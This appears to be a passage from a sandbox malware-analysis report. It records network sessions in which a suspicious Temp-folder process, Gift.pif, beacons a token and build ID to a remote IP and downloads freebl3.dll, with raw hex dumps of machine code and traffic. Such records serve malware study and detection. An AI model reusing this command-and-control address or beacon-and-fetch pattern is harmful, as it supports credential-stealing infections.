2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
    Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
    Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
2024-08-05 16:56:01 UTC | 16384 | IN | Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
    Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49721 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:03 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Content-Length: 829
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:56:03 UTC | 829 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74
    Data Ascii: ------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHIEBKKFHIEGCAKECGHJCont
2024-08-05 16:56:04 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:56:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-08-05 16:56:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549722188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:04 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 437
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:04 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii (line breaks restored from the 0d 0a bytes of the hex dump):
                                                                        ------HJJEHJJKJEGHJJKEBFBG
                                                                        Content-Disposition: form-data; name="token"

                                                                        371764cf8efc1b40dfc15a6ff874b301
                                                                        ------HJJEHJJKJEGHJJKEBFBG
                                                                        Content-Disposition: form-data; name="build_id"

                                                                        dc0c9f3971cace826e9cb1916d9d3a66
                                                                        ------HJJEHJJKJEGHJJKEBFBG
                                                                        Cont
                                                                        2024-08-05 16:56:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2\r\nok\r\n0\r\n\r\n  (chunked; decoded body is "ok")


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.5 | 49723 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:05 UTC | 325 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 437
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:05 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74
                                                                        Data Ascii (line breaks restored from the 0d 0a bytes of the hex dump):
                                                                        ------AFHDGDGIIDGCFIDHDHDH
                                                                        Content-Disposition: form-data; name="token"

                                                                        371764cf8efc1b40dfc15a6ff874b301
                                                                        ------AFHDGDGIIDGCFIDHDHDH
                                                                        Content-Disposition: form-data; name="build_id"

                                                                        dc0c9f3971cace826e9cb1916d9d3a66
                                                                        ------AFHDGDGIIDGCFIDHDHDH
                                                                        Cont
                                                                        2024-08-05 16:56:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2\r\nok\r\n0\r\n\r\n  (chunked; decoded body is "ok")


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.5 | 49724 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:07 UTC | 244 | OUT | GET /freebl3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:07 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:07 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 685392
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:07 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:07 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                        Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                        Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                        Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                        Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                        Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                        Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                        Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                        Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 